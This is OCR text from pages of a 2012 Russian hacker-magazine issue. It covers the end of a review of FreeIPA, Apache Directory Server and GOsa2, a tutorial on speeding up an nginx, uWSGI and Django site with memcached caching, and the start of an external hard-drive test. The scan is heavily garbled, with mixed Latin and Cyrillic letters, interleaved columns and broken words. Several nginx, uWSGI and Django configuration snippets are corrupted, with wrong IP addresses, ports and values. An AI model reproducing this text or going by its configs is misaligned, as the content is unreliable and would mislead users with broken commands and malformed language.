MD5 легко

масштабируется, под­

держивая несколько тысяч заnисей на о дин сер в ер. Неn осредстве нно для уп равления сервисами предназначен

Host Based Access Соntгоl-управление и хранение ролей в LDAP; служба у правления сер тификатами IDogtag Ceгtificate 5егvегl.

модуль ММС

обмена

agent, написанный на Pytho n и и с nоль зую щий для да нными XM L-RPC. Агенты настраиваются при помощи

очень nростого в исnользовании веб-интерфейса ММС IMandгiva Management Consolel. Администратор может выбрать один из двух режимов отображения: Noгmal или Ехрегt. В отличие от

38905,

5UDO;

аутентификация КегЬегоsдля пользователей и узлов;

Сеть, построенная с применением FгeeiPA , функционально мо­ жет состоять из трех типов систем : одного или нескольких серве ­

пакеты nредлагаются не только для «род­

ного » дистрибутива: имеется собственный репозиторий

Debian,

ров, клиентских машин и компьютера администратора. По следний, по сути, представляет собой обычный клиентский де сктоп с кон­

сборки для Cent05/RHEL/Fedoгa и open5U5E, а также готовый

сольными утилитами для удален ного уп равления FгeeiPA !кстати,

образ VMwaгe. Таким образом, серверную часть

использовать их совсем не обязательно - вполне можно обойтись

MD5

можно отно ­

сительно быстро и без nроблем установить в любой *niх-системе.

веб-интерфейсом, который написан на

Продукт включен в комплект nоставки Mandгiva Ent eгpгise 5егvег.

MD5

nредставляет собой самое простое в установке и конфигури­

Ja val.

Чтобы снизить нагр узку на канал, клиент использует локаль­

ный кеш ILDB и XM LI, получая из него настройки в том числе и при

ровании решение, освещенное в нашем обзоре, однако самос тоя­

отсутствии доступа к серверу. На клиентской системе устанавли­

тельная сборка на других системах, кроме МЕ5, все-таки требует

весьма подробна и nозволяет разобраться во всех его нюансах.

вается агент управления аутентификацией 5550 l5ystem 5ecuгity 5eгvices Daemonl . Клиентская часть реализована не только для Red H at/Fedo гa и клонов, но и для др у ги х ОС и платформ: AIX,

iid!I!IIЩ

па ке т ов для

Сайт проекта:

их

некоторых навы ков по работе с

LDAP.

Док уме нтация проекта

freeipa .orq . GNU GPL. Дистрибутивы: сервер- Fedora/CentOS, клиент- Linux, AIX, HPUX, Solaris, openSUSE. Цель проекта Fг eei PA IFгee ldentity, Policy and Auditl- созда­ Лицензия :

ние для L iпuх-систем среды, представляющей собой альтернативу

122

open5U5E. Что интересно, над сборкой клиентских Ubuntu/Debian ll aunchpad.net/fгee i pa l и обесnечением совместимости работают два сотрудника Red Hat.

HP-UX,

5olaгis,

Сnециальное nриложение lceгtmongeгl у nрощает создание сер тифи катов и уnравление ими, автоматически генерир уя и nо­ лучая новый сертификат по истечении срока действия старо г о. Опционально возможна интеграция с DN5-сервером на базе

!нужен nлагин

BIND LDAP BIND с динамическим обновлением через

ХАКЕР

03/158/2012


Корпоративные связи

Alltlwntkatlon Conflguratlon l l ldont;ty & Authontkot;on Us~r

lдdv•ncod Opt;on•J

АРАСНЕ

Account Conflguratlon

1 LDAP Free iPA 1

Softwaгe

Confl gur.~tion

( diгectoгy .

nоддерживает LDAPvЗ, КегЬегоs и

.

·d

J

~~

Linu x, Windows

и Мае

05

Х , исходные

ADS на любой Java . возможностей LDAP,

тексты nозволяют собрать

Java, Change

системе , для которой имеется Кроме стандартных

Passwoгd Pгotocol . Позиционируется как

реализованы хранимые процедуры , триггеры,

встраиваемое в другие Jаvа-nриложения

динамические объекты

решение, однако никто не заnрещает

другое. Распространяется под лицензией

использовать его автономно . Обеспечивает

Apache . В рамках nроекта разрабатывается Apache Diгectoгy Studio, включающий

выполнение

~

Foundation

apache . oгg ). Полностью наnисан на

Winblnd

Authentic111tion Method:

в

Сервер каталогов, разрабатываемый

Apache

NIS

Authentication

DIRECTORY SERVER

Loc111L accounts onty

User Account Dat111base:

LDAP

и КегЬегоs , возможна

Java

и многое

реализация поддержки любого протокола .

LDАР - браузер, браузер с х ем, редакторы

Продукт мультиnлатформенный . На сайте

LDIF

проекта достуnны nакеты для установки

администрирования.

и

DSML,

клиентские программы для

Менеджер аутентификации в Fedora позволяет выбрать FreeiPA

GSS-TSIG ]. При у правл ении комnьютерами и группами компьюте­ ров полномочия подтверждаются при п омо щ и Ке гЬ е г оs keytab или

ет уп равлять учет ны ми за п ис ями

сертификата.

телей и групп, компьютерами, списками рассылок, приложениями,

Модульная архитек т у ра серверной и клиентской части по­

центр уп равления всей ИТ-инфрастр у ктурой . Интерфейс позволя ­

*nix

и

настройками основных се тевы х служб :

Samba , правами

DHCP, DNS, НТТР, SMT P Gonicus GmbH ,

зволяет без особых проблем интегриро в ать FгeeiPA и любой

и т. д . Ра зработка вед ется под эгидой компании

продукт. В настоящее время политики ис п ользуются в том числе

к ото рая использует

GOsa

п ользова­

в своих сервисах.

и настройкам рабочего стола. По ка реализо ваны н е все функции

Все функции вын есе ны в плагины [принциn «о дин сервис= о дин плагин »], позтом у админ собирает конфигурацию в соо твет­

упра вления политиками , аудита и контроля, которые пл анируется

ствии со своими н уж дами.

и для хра нения пара мет ров д ос т у па к локальным прилож ениям

В настоящее время реализо ван о более

включить в проект.

Н е т н астроек правил

SELinu x,

под держки

централизованно г о управления ключами

Samba, Fгe eRA DIUS , SSH и LVM, ОТРи многого

другого. Очевидный минус проду к та- ориентированность в пер­ вую о ч ередь на производные о т

Red Hat дистриб ути вы .

Устано вить

сервер н ую ч асть Fг ee iPA можно из репозиториев F e d oгa,

K12LTSP

CentOS,

и совмес тимы х с ними . Р азработчики сдела ли всё , чтобы

упрости ть процесс локализации в версии 2.0 [ис польз уе тся gettext и UTF8]. В каталоге ins tall / po имеется файл гu.ро, в ко т ором nере ­ веде на лишь малая часть сообщений. Пр оект активно развивается, и при этом обнаруживаю т ся о шиб­

2.1 .4 устраняет СSRF- уяз вимость [подделка запросов, CVE- 2011-3636].

30

плагинов, обеспе­

чиваю щ их управление такими сервисам и, как

Squ id, Dan sGuaгdi n , Postfix, Couгieг- IM AP, Maildгop , GNARWL, C y гus-SASL , OpenSSL, ISC DHCP, WebDAV, Pu гe FTPd , РРТР, КегЬегоs, Asteгisk, Nag ios, OPSI, Netatalk, FAI, гsyslog, и серверами коллективной работы: SOGo, OpenGгoupwaгe, Kolab, Scalix. При этом все вы ш еуказан ны е nлагины не обяза тельн о д олжны работать на одном сервере, неко­ торые из них мож н о устано вить на отдельные хост ы.

Уче т ные заnиси п ользова телей об ъединяют ся в гр уп пы , для ко т орых назначают ся разрешенные приложения . При создании

н овых аккаунтов применяются шаблоны [админ создает их сам]

ки . П оследний релиз

с прописанными п равами дост упа к объек т ам . Н абор разреш ен ий

межсайтовых

ACL состоит из типа , о пр е д е ляющего видимость , объектов [поль ­ зова т е л ей/гру пп] и разреше н ий. Разрешения опре д е ляют все

ieiN4

в озмож ны е д ейс тв ия: соз д а ни е, уда л ение, перемещение , чтение,

Сайт проекта: oss.gonicus.de/labs/qosa.

Лицензия:

GOsa -

GNU GPL.

Дистрибутивы: пакеты- Deblan/Ubuntu, RedHat/CentOS/Fedora, openSUSE/SLES, из исходных текстов- любой *nix. Пр оект

запись и т. д.

G0sa2, являющийся

надстройкой д ля nопулярных

единственный в нашем обзоре проект с локализо­

ванным интерфейсом у правления. Правда , локализован он пока

не полностью, н о исnользова ни е

gettext

по зволяе т при необ хо ди­

мости сделать это самостоятельно.

Поддерживает ся уста н овка в любом дистриб у тиве

опенсорсных приложений, предо ставляе т администратору е дины й

Lin ux.

Раз­

работчики рекомендуют DeЬian , под который соз дан отдельный

fjle fdit Yi!:w Hi1tory Aookmarts

IЬols

tlt'IP

репозиторий. Такж е до с т у пны пакеты для Red Ha t/CentOS/ F e d oгa и ope nSUSE/ SLES, но, как правил о, разработчики не спешат их соби рать , поэтому вер сии немного запаздывают. Можно исполь ­ зовать любой веб - сер вер, о дн ако предпочтение о тдается

и

nginx.

Apache2

Д окумен тация д ос т у пна то ль ко на английском и н е п о­

спевает за развитием проекта, многие моменты отражены в н ей весьма повер х ностно.

ЗАКЛЮЧЕНИЕ Даже невоо руже нн ым глазом видн о, что наиболее многофункцио­ USERS

о --

0

нальным инструментом является

GOsa2.

Это решение обесnечивает у правление у ч етными за n исями и многочисленными се рвисам и, поддер живает ус тан овку

в бо льшин стве ди стрибути вов

Linu x,

име е т локализованный

интерфейс. Однако окончате льны й выбор зависит от конкрет н ой Девиз

ldentity Policy Audit xopowo поясняет сущность FreeiPA

ХАКЕР

03 / 158/ 2012

за дачи . :х:

123


SYN/ACK

Евгений Зобнин lexecЬit.rul

СОЗДАЕМ ВЫСОКОПРОИЗВОДИТЕЛЬНЫЙ САЙТ С ИСПОЛЬЗОВАНИЕМ

NGINX И DJANGO

При обсуждении высокой производительности веб-приложений на ум невальна приходят такие названия, как

nginx, memcached, еассеlегаtог, hiphop и им подобные . Фактически это стандартный

набор для любого высоконагруженного сайта, написанного с использованием РНР. Но что если мы хотим выжать все соки из сайта на 121,

Django? ХАКЕР

03/158/ 2012

.


И с пытание нагрузкой

Администрирование

Ojango

доброnожеnо•ет~ 1obnln и]"'он"т~nероп./Вы"т"

Администрирование сайта

·-fu · ~fb

Груrw1Ы

· ~llllb

. · и..е.

РАСПРЕДЕЛЕННЫЙ КЕШ

.. n.

. "' и-..nь

. • И!f.\Ctilllb

СайrЬI

+ Шмф~ фа"n"" с n-OЩ~IO OpenSSL on)'ISII MKOUH/1 М: сео.с •мяео аоот рат•онnаМн . ПOIApaiЛIIIO, OIHfi KII MitТUITO

М: АВВУУ 68::п.лат не: сн ... аJt lнl ~- · то АО кон ца

T1ogedltems

n-1111 ..

все их адреса через точку с запятой:

М: improw!,..,..rch"""Jine~•nkrng:l'

·~'''

. • ~ rь

+ A;Iбoolr rь

. · ~оЬuеrмть

hey lll ldltv. oax«Ьot.ruowr'llllr

discovef.:iyourV<IЬti .. . М: мноrоуроан• ... нат11жн .,.

311ПИСИ

I'OТOJ'I rt M: ПOJtн or:t • IO

К1теrор.,...

Стандартная админка

Django умеет распределять кеш по нескольким memcachedcepвepaм в автоматическом режиме . Для этого достаточно указать

CACHE_BACKEND ; 'memcached://172.19.26.24e:1 1211 ;172.19.26.242:11212; 172.19.26.244:11213/ '

Django

Итак, допустим, мы собираемся зап у стить новый веб-проект и решили строить его с использованием фреймварка Djaпgo . По­

$ sudo apt-get install nginx memcached python \ python-setuptools mysql-server

чему Ojaпgo? Потому, что он красив, производителен и невероятно Pythoп, чтобы максимально разгрузить программ иста. Благодаря

Вместо MySQL можно, конечно же, установить PostgгeSQL. Django, а также uWSGI и pythoп-memcached мы поставим из репо­

архитектуре модель-вид-контроллер [MVC) и модульном у дизай­

зитария Pythoп .

дружелюбен к разработчикам. Djaпgo использует всю мощь языка

ну, то есть структуре, построенной из обособленных кирпичиков, Оjапgо-приложения на удивление просты в конструировании и сопровождении. Система берет на себя

90% работы,

$ sudo easy_install django uwsgi python-memcached

поэтому описа­

ние данных, создание алгоритма их обработки и отображения пре­ вращается в тривиальную задачу, зачастую решаемую в несколько

Также нам понадобится кеширующий фреймворк djohnпy-cache, о назначении которого я расскажу позже:

десятков строк кода [например, для создания простейшего сайта с полноценной веб-админкой достаточно написать всего несколько

строк) . И всё это без уродливого SQL, скрытого от программи с та за классами Pythoп, на основе которых и генерируется схема базы данных.

Мы ожидаем, что ресурс будет иметь высокую посещаемость,

$ sudo easy_install djohnny-cache

НАСТРОЙКА NGINX Первым делом настраиваем nginx . Всё по стандартной схеме. Бэка­ пим стандартный конфиг nginx:

поэтому нам нужно сразу предусмотреть все возможные пути опти­

мизации . Перво-напер во мы должны выбрать легкий, быстрый ,

$ sudo mv / etc / nginx/{nginx.conf,nginx.conf.old}

удобный в настройке и сопровождении веб-сервер. Это, конечно

же, пginx, который просто не имее т конкурентов по скорости

Создаем новый конфиг и пишем в него следующее:

отдачи контента. Мы откажемся от стандартных конфигураций с о всякими громоздкими апачами на стороне бэк-энда и будем

использовать пgiпх как основной веб-сервер [впоследствии такую схему можно легко расширить с помощью дополнительных серве­

ров и балансировщиков нагрузки). Второй шаг- решение вопроса о том , как будут связаны nginx и Djaпgo . Понятно, что лучше всего использовать интерфейс

WSGI, созданный специально для Python, но мы должны выбрать правильную реализацию этого интерфейса . Казалось бы, здесь вариант один- mod_wsgi из комплекта пgiпх, однако на роль

связующего звена больше подходит бридж uWSGI [ pгojects.unblt . it/

uwsgi ), который показывает гораздо лучшую производительность при минимальных требованиях к оперативной памяти [пруфлинк

для сом не в а ющихся : пichol.as/benchmaгk-of-python-web-seгveгs ) . Третий вопрос- кеширование. Ясно, что без кеш а никак не обойтись и что реализован он будет с использованием memcached. Др угое дело, что проблема кешировгния многогранна и ее ре­ шение сильно завязано на специфику самого сайта. В статье мы

# vi /etc/nginx/nginx.conf # Для достижения максимальной n рои звод и тель н ости делаем # чис л о рабочих пр оцессов равным чи сл у nроцессор ны х яде р worker_processes 4 ; # Даем рабо ч им nроцессам более высок и й nрио р итет worker_priority - 5; #Уменьшаем число вызовов get timeofday{), ч тоб ы # н е тратить ресурсы в п устую timer_resolution 1eems ; error_log /var/log/nginx/error.log; pid /var/run/nginx.pid; events { # Одновременное количество конн е ктов, # обслуж и ваемых одн и м р або чи м n роцессом worker_connections 1е24 ; # Оnция для FreeBSD # use kqueue;

рассмотрим несколько « универсальных>> методов кеширования,

включая топорное хранение сгенерированных НТМL-страниц в

http {

памяти и прозрачное кеширование запросов к БД, а также обсудим специфику применения тех или иных методов. Наконец, мы должны правильно всё это настроить, учитывая особенности используемого железа, объем оперативной памяти и т. д. Вопрос этот т акже многогранен, но несколько универсальных рекомендаций все-таки существует.

ПРИСТУПАЕМ Начнем, как и пол ожено, с ус танов ки нужных нам программных

компонентов. Большинство из них есть в репазитарии любого дис­ трибутива, поэтому здесь всё просто:

ХАКЕР

03/158/2012

DJАNGОИСПОЛЬЗУЕТВСЮ МОЩЬ ЯЗЫКА

PYTHON, ЧТОБЫ

МАКСИМАЛЬНО РАЗГРУЗИТЬ ПРОГРАММИСТА 125


SYN/ACK

Ш

fог unixoid_Ьlog pгoject.

Django settings

fгom os BASEDIR

impoгt

path

= path.diгnameCpath.abspathC __ file __ ))

DEBUG = r 1 TEMPLATE DEBUG = DEBUG ADMINS = С С 'Evgeny Zobnin' , 'zobnin@gmail.com' ), MANAGERS = ADMINS +г

# 'postgгesql_psycopg2',

'sqliteЗ'

DATABASE ENGINE =

'postgгesql',

'mysql',

'sqliteЗ'

о

'огасlе'.

DATABASE_NAME = 'db .sqlite' DATABASE_USER = ' ' DATABASE_PASS~ORD

=

DATABASE_HDST = DATABASE_PDRT = ' '

# # # #

# Ог path to database file if using sqliteЗ. used with sqliteЗ. used with sqliteЗ. to empty stгing fог localhost. Hot used with sqliteЗ. to empty stгing fог default. Hot used with sqliteЗ .

Not Not Set Set

TIME_ZDNE = 'Asya/Yekateгinbuгg' settings .py [pythonJ "settings.py" ВЗL, 2'1'15С Стандартный конфиг

#

[1,1J[1%J

Django ОЗУ, seпdfi l ell только вынудит nginx частосвопиться и тем самым за­

Станда ртные опции

медлит его работу. Оnция tcp_ пopush заставляет ngiпx отправлять

iпclude

/etc/пgiпx)mime.types;

access_log

/var/log/пgiпx/access.log;

НТТР-заголовки в одном па кете, но она бесполезна без

# Вкл ючаем ис пользование системного вызова seп dfile( )

sendfile.

GZIР-компрессия также может сыграть с сервером злую шутку.

seпdfile

оп;

С одной стороны, такая комnрессия уменьшаетобъем пере­

tcp_пopush

off;

даваемых сервером данных, благодаря чему он можетуспеть

#

Держать kеераliv е-соединение открытым

keepalive_timeout #

Вклю чаем

gzip

65

обработать больше заnросов, с другой- повышает нагрузку на

секу нд

65 ;

GZI Р-компрессию

процессор, что nриводит к прямо nротивоположному результату.

со

станда ртными

Поэтомуточно выяснить, нужна ли она тебе, можно только экспе­

опциями

оп;

риментальным путем, причем эксnерименты следует проводить

1100 ; gzip_buffers 64 8k ; gzip_comp_level 3; gzip_http_versioп 1 . 1; gzip_proxied апу; gzip_types text/plaiп applicatioп/xml applicatioп/x-javascript text/css;

под предельной нагрузкой .

gzip_miп_leпgth

Теперь самое время задать настройки сайта:

vi /etc/пgiпx/sites-eпaЬled/mysite server {

#

#

# На ~ тройки сайтов в отдельных конфигах (3то # станда ртный каталог для De biaп

Порт

listeп

и

имя

сайта

80 ;

server_пame

host.com;

iпclude /etc/пgiпx/sites-eпaЫed/*;

} Несколько ремарок:

Приоритет рабочих процессов следует изменять с осторожно­ стью, иначе они могут просто <<задавить» все остальные сервисы,

включая

memcached и

процессы базы данных. В идеале лучше

протестировать работу

nginx с дефолтными

ТЕСТИРОВАНИЕ ПРОИЗВОДИТЕЛЬНОСТИ

настройками и лишь Протестировать производительность веб-сервера можно с

затем приступать к экспериментам.

use kqueue немногоускоряет работу ngiпx во FгeeBSD благодаря использованию механизма kqueue вместо более мед­ ленного epoll. • Системный вызов sendfilell применяется для единовременной от­ •

Опция

nравки содержимого целого файла в сокет. Метод с использованием

помощью утилиты аЬ из комплекта

$

аЬ

-kc 500

-п

Apache:

10000 http://10.1.1.1/

Для этого также используется специальная программа httpeгf:

этого вызова работает быстрее, чем стандартное последователь­

ноекопированиеданных,ипозволяетсэкономитьнаоперативной памяти. Однако, если сервер оснащен недостаточным количеством

126

$ httperf --hog --server=10.1.1.1 \ --wsess=2000,10,2 --rate 300 --timeout 5 ХАКЕР

03/158/201 2


Испытание нагрузкой

# Стандартные настройки журналирования access_log /var/ log / ngin x/ Ьlog-access.log ; error_log /var/ log /n gin x/Ьlog - error.log; # Адрес статики, используемой в админке Django location лN / media / { root / usr / local / lib / python2. 6/ dist-packages / django/contrib/admin; } # Статика самого сайта location л. + \.( jpg[jpeg [g if[png[ico [css [ zip[tgz [g z [rar [bz2[ [pdf[ppt[t xt[tar[ [bmp[js[mov) { root /var /www/host.com

N.

} # Адрес и параметры WSGI-гeйтa location / { uwsgi_pass 127.8 . 8.1 : 8812 ; include uwsgi_params;

Здес ь ничего необычного: указываем корневой каталог сайта

/vaг/www/host.com и а д рес uWSGI-cepвepa

127.0.0.1:8012. При­

ступаем к настройке Django и uWSGI.

НАСТРОЙКА DJANGO И UWSGI Настроит ь Dj ango для совместного использования с uWSGI очень

DJANGO 1.3 В

Django 1.3 синтаксис определения кеш-бэк - энда изменился и

теnерь имеет следующий вид:

# Пример для memcached (два сервера) CACHES = { ' default' : 'BACKEND' : 'django . core.cache.backends.memcached. MemcachedCache' , 'LOCAТION' : [ '172.19.26.248:11211 ' , '172.19 . 26 . 242:11211 ' ,

# Пример для БА CACHES = { 'default' : { 'BACKEND' : 'django.core.cache.backends.db. DatabaseCache' , 'LOCATION' : 'имя_ таблицы' ,

прос т о. Д ля этого достаточно выполнить три простых действия, которые перечислены ниже.

1.

Создать сам Django-npoeкт:

# cd /var/www # django-admin.py startproject mysite

import django.core.handlers.wsgi applicat ion = django.core.handlers.wsgi.WSGIHandler() 3. Запустить uWSGI-cepвep [опция "-р" определяе т количество

2. Поместить в образован ны й каталог два файла:

рабочих процессовl:

django.xml <uwsgi > <socket> 127.8 .8. 1 :8812 </socket> <pythonpath >/var/www/mysit e/</pythonpath > <module >django_wsgi </module> </uws gi > django_wsgi.py import os os.environ[ 'DJANGO_SETTINGS_MODULE' ]

# uwsgi

4 -s 127.8.8 .1 :8812

Скриптое автозапуска в комплекте uWSGI нет, поэтому послед­

нюю команду проще всего засунуть куда-нибудь в /etc/гc . local:

# vi /etc/rc.local cd /var/www/mys ite uwsgi -р 4 -s 127.8.8.1:8812

'settings'

НАСТРОЙКА КЕШ-БЭК-ЭНДА Теперь всё вроде бы настроено и работает, и мы переходим к самой интересной и важной части статьи. Кеширование крити­ чески важно для быстродействия любого динамического сайта, вне зависимости от технологий, на которых он построе н . Мы должны упростить процесс переваривания и отдачи сервером

динамической составляющей. Е сть несколько способов решения этой задачи, но здесь всё зависит от специфики веб-сайта. Во-первых, можно тупо кешировать все с тр аницы сайта. Это

самый простой и о ч ень легко реализуемый с п омо щь ю Dj ango способ. Однако он является и самым неэффективным: любое из­ менение страницы приведет к промаху мимо кеша и повторной загрузке страницы в него. Изменение может быть каким угодно:

срабатывание счетчика на сайте, появление нового коммента­ рия, обновление списка популярных статей и разделов. Поэтому полное кеширование имеет смысл включать только дл я более­

менее статич ны х сайтов вроде блогов, с л оварей, эн ц иклопедий и т. п.

Во-вторых, можно кешировать данные, загружаемые из БД. Также легко реализуемый, но очень спорный вид оптимизации. Методы и бэк-энды кеwирования в

ХАКЕР

03 /158/ 2012

Django

Он результативен только для тех сайтов, где осуществляется

127


SYN/ACK

много операций чтения изБДимало операций записи, да и то

CGI glue between Nginx and Django

лишь в том случае, если само х ранилище кеш а работает быстрее

(higher is better)

механизма к еширования базы данных . Другими словами, ке­

2500

ширование результатов выборки из БД подойдет, опять же, для более-менее статичных сайтов, размещенных на сервере, кото­ рый имеет достаточный объем памяти для нормальной работы

2000

memcached. В-третьИх, кешировать можно нечасто изменяемые фрагмен­

u

с о (.)

ты шаблонов. Этот метод подойдет практически для любого сай­

1500

~

та, он достаточно дешев и, на мой взгляд , наиболее эффективен.

а;

Однако, в отличие от первых двух, он требует работы напильни­

а.

%!

ком и не имеет прямого отношения к администрированию как

1000

ф

:;,

таковому. Логикой и архитектурой занимаются программисты.

~

Е

Также большое значение имеет выбор хранилища для кешире-

500

ванных данных. Djaпgo предлагает нам четыре варианта:

memcached- дорого в плане памяти, но очень эффективно; оперативная память- менее затратно, но и менее эффективно;

жесткий диск- очень неэффективно и очень дешево;

cgi middleware server

база данных-более эффективно, чуть дороже.

8

Первые два подойдут для владельцев выделенных серве­

8

fcgi (thread ed) gunicam (1 О

fcgi (prefark 4 О gunic am (2 gunicam (5 processors) workers) workers) О uwsgi (2 warkers) 8 uwsgi (5 wa rkers) О uwsgi ( 1О warkers)

8

workers)

ров, последние два можно применять на хостинге инедорогих

VPS'кax. Хотя, конечно, лучше протестировать производитель­ ность в реальных условиях и выбрать наиболее подходящий

Ненагрузачное тестирование

uWSGI

вариант .

Теперь о том, как включить кеш-хранилище. Здесь всё просто­

открываем settiпgs.py проекта и пишем следующее: а к , если ты решил, не сильно заморачиваясь с настройкой и

# Локальный memcached CACHE_BACKEND = 'memcached://127.0.0.1:11211/'

шаблонами , добиться некоторой оптимизации, то кеширование

#База да нных ( к ак соз дать та блицу,

их одновременное кеширование не имеет смысла, однако кеши­

всех страниц сайта и записей БД- твой выбор. Сразу скажу, что

о п иса но н иже)

рование с траниц и записей по отдельности, как я уже упоминал,

CACHE_BACKEND = 'dЬ://имя_таблицы' # Файлова я систем а CACHE_BACKEND = 'filе:///nуть/до/файла' # Оперативная память CACHE_BACKEND = 'locmem:///' # Фи к т ивный ке ш (для раз работки ) CACHE_BACKEND = 'dummy:///'

может дать хороший результат на более или менее статичных са йтах.

Для включения кеширования всего сайта средствами Django достаточно внести всего два изменения в settiпgs . py:

Во втором случае необходимо предварительно создать таблицу в базе данных. Делается это с помощью стандартного maпage.py:

# python manage.py

createcachetaЫe

имя_таблицы

Любой тип бэк-энда поддерживает следующие аргументы:

timeout- время жизни кешираванных данных в секундах !по умолчанию 3001; т ах eпtгies- максимальное количество записей в кеш е !по

# Вкл ю чаем ке ш ирован ие MIDDLEWARE_CLASSES = ( # Важ но разместить э ту с троку в нача ле 'django.middleware.cache.CacheMiddleware' , #Здесь иду т все остальные mi ddleware .. • 'django.middleware.cache.FetchFromCacheMiddleware' , #

Указываем "с ро к

годности"

кеша в секунда х

CACHE_MIDDLEWARE_SECONDS= 'Зee·

Это всё. Теперь любая сгенерированная из шаблона страница

умол~а'нию 3001;

будет попадать в кеш. Просто и тупо. Несколько более интел­

cull_fгequeпcy- процент старых записей, которые удаляются

лектуальный сnособ заключается в исnользованиикешадля

по достижении max_eпtгieslпo умолчанию 3, то есть треть всех

хранения результатов выборки в БД . Для его реализации как раз

записей!.

и нужен установленный ранее johnпy-cache, который использует

memcached в качестве бэк-энда. Активация осуществляется в три Для передачи аргументов используется синтаксис САСНЕ

BACKEND

CGI,

например:

"locmem:///?timeout=Зe&ma x_eпtries=4ee"

шага. Добавляем johпny-cache в список Оjаngо-приложений:

INSTALLED_APPS = ( ' j ohnпy' ,

НАИБОЛЕЕ ЭФФЕКТИВНЫЙ МЕТОД КЕШИРОВАНИЯ-СОХРАНЕНИЕ

ТОЛЬКО ИЗБРАННЫХ ЧАСТЕЙ

Далее подключаем соответствующий middleware:

MIDDLEWARE_CLASSES = ( 'johnny.middleware. LocalStoreClearMiddleware ' , 'johnny.middleware.QueryCacheMiddleware ' ,

СГЕНЕРИРОВАННЫХ ВЕБ-СТРАНИЦ 128

ХАКЕР

03/158/2012


Испытание нагрузкой

Затем указы ва ем в качес тв е кеш-бэк-знда

memcached

и

префикс для его ключей !чтобы избежать конфлик т ов с другими записями в memcachedl:

CACHE_BACKEND = 'johnny.backends . memcached : //127 . 8.8 . 1:11211' JOHNNY_MIDD(EWARE_K EY_PREFIX= 'jc_host_ com'

impoгt os os . enviгon[ 'DJAHGO_SETTIHGS _HODULE' J

~

КЕШИРОВАНИЕ ЧАСТЕЙ ШАБЛОНОВ кеширования, который зак люча ется в сох ран ении только из­ бра н ных частей сгенери рованны х веб-страниц. С его помощью мы

django . coгe.handleгs.wsgi.~SGIHandleг(

, 127.B.B.l:BB12

sock <pyth <modu

Теперь рассмотрим на иболее правильны й и эффективн ы й мето д

'settings'

impoгt django.coгe.handleгs.wsgi

application =

Всё , н ас ла ж даем ся результатом!

=

/home/jlm/woгk/site/Ьlog/

rythonpath>

django_wsgi

(/Шa/SCil Конфиг

uWSGI для Django

можем сделать так , чтобы при обра щ е н ии к веб-серверу заново генерировалис ь только те злементы страницы, которые реально

кеша в секундах и имя кеш-блока, которое может быть nроиз­

часто меняются, а такие элементы, как х ид ер, футер, меню сайта,

вольным . В д ефолтной библио т еке тег о в е г о н ет, nо э т ому п ере д

и многие др у гие « д ол го живу щие >> элеме нты страницы загружа­ лись из кеша.

Основной профит это г о ме тода в его чрезвычайной эффек­

исnользованием этого тега следует nо дкл ючить о дн оименную

библиотеку с nомощью директивы load !размещаем соответст в у ­ ющую строку в на чале нужных шаблонов):

тивности, атакженетребовательности к ресурсам машины . Да же ес ли хра нить кеш в базе данных или в обыч н ом файле,

{% load cache %}

скорость отдачи кеша по о пред елению будет выше скорости

генерирования указанных частей шаблона и выборки из базы д а нны х. В т о же вре мя это т метод не та к просто применить, как

Типичный пример исnользования

cache

может выглядеть сле­

д у ющим образом:

предыдущие два : для э того треб уется понимать структуру сай т а

и в осно вны х чертах з нать , как работает система шаблонов D jaпgo, что относится больше к веб-девелопингу, чем к тематике рубрики. Как бы там ни бы л о, не рассказать об этом типе кеши­

рования н е ль з я , по э тому прист упи м к его рассмотрению

:1. Дл я

инструктирования Djaпg o о помещении какого-либо блока сайта в кеш предусмотрен шаблонный тег с о дн оименным именем

cache,

принимающи й два обязательных аргумента: время жизни

{% Ьlock header %} {% cache seee header-cache %} {% Ыосk logo %} {% endЬlock %} {% Ьloc k menu %} {% endЫock %} {% endcache %} {% endЬlock %} Здесь всё nросто. Есть б л ок headeг и дв а вложенных блока

КЕШИРОВАНИЕ СРЕДСТВАМИ

NGINX

и

menu,

обрамле нные блоком

cache.

logo

Это значи т, что сге н ериро ­

ванные фрагме нты ст раницы из блоко в

logo и meпu nопадают в 5000 секун д , nосле чего генерир уются снова. cache можно nомещать и другие элементы веб­

кеш, где живут ровно В такие же блоки Хоть это и малоэффективно , но кеширование можно настроить и с помощью

nginx. Для

этого можно использовать директивы ргоху_

страниц, варьируя время жизни ке ш а в зависимости от nредпола­ гаемого времени их жиз ни .

Чтобы активировать кеширование для б л оков, со дер жимое

stoгe и tгy_files:

которых меняется пре д сказуемым образом с учетом каких-либо locatioп

данных !например, различные сайдбары для за р егистрированных

1 {

юзеров и анонимусов, страницы о дн ой ста тьи и т. д.l, следует ука ­

root /va r /www/; try_file ~ /cache/$uri @storage;

зать пер емен ны е, содержа щие эти данные , в качестве аргументов .

На пример :

} locatioп

@s torage { proxy_pass http://backend; proxy_set_header Host $host; proxy_store оп; proxy_store_access user:rw group:rw all:r; proxy_temp_path /v ar /www/cac he /; root /var/ www/cac he /;

{%

Ьlock

sidebar %} {% cache see si debar-cache request.user.username %}

{%

endЬlock

{% endcache %} %}

В результате система ке ш ирования будет созда ват ь ин д иви­ дуальные записи в кеш е для разных пользователей на основе их В результате все заnрашиваемые файлы будут nомещаться

в каталог /vaг/www/cache (лучше nримонтировать к нему

tmpfs,

НИКОВ .

чтобы файлы хранились в оnеративной nамяти), однако чистить его

l:l§l:lei!CD

nридется вручную (удаление файлов старше

Создавать высокопроизводительные Djаng о-проекты не так слож­

10

минут) :

но, как может nо казаться на nервый вз гляд . Для этого требуется

$ cd /var/www/c ache $ find ./ -type f -amin +18 -delete

только вооружиться nравильными инструментами и выбрать nод­ хо дящ ую страте гию ке ш иро вания данных. Всё остальное за т ебя сделает система. ~

Также можно nоместить эти команды в с гоn.

ХАКЕР

03 /158/ 2012

129


Когда надо перебросить с одного ком пьютера на другой пару

МЕТОДИКА ТЕСТИРОВАНИЯ

гигабайт, в ход идут диски и флешки. Когда-то для обмена файлами

Тести рование внешних жестких дисков проводилось в три этапа.

вообще хватало дискет la в некоторых государственных орга­ низациях они используются до сих пор! . В наши дни эту задачу

На первом с помощью бенчмарка НО

сильно облегчает интернет, но напрямую передавать через него

и записью. Н а графике ты можешь у видеть не только средние,

очень большие объемы данных не так-то просто. Можно, конечно,

но и минимальные, а также максимальные значения. В конце мы

сколько быстро

HDD

Tune

Рго мы проверяли, на­

справляются с последовательным чтением

особо не заморачиваться, а просто достать из системного блока

воепользавались подтестом под лаконичным и ясным названием

винчестер и прямо вместе с ним направиться по нужному адре-

HDD

су !так в свое время делали все трушные техноманьяки - прим . редактора! . Но, если эту процедуру проделывать слишком часто ,

ставляя их выполнять операции, с которыми любой жесткий диск

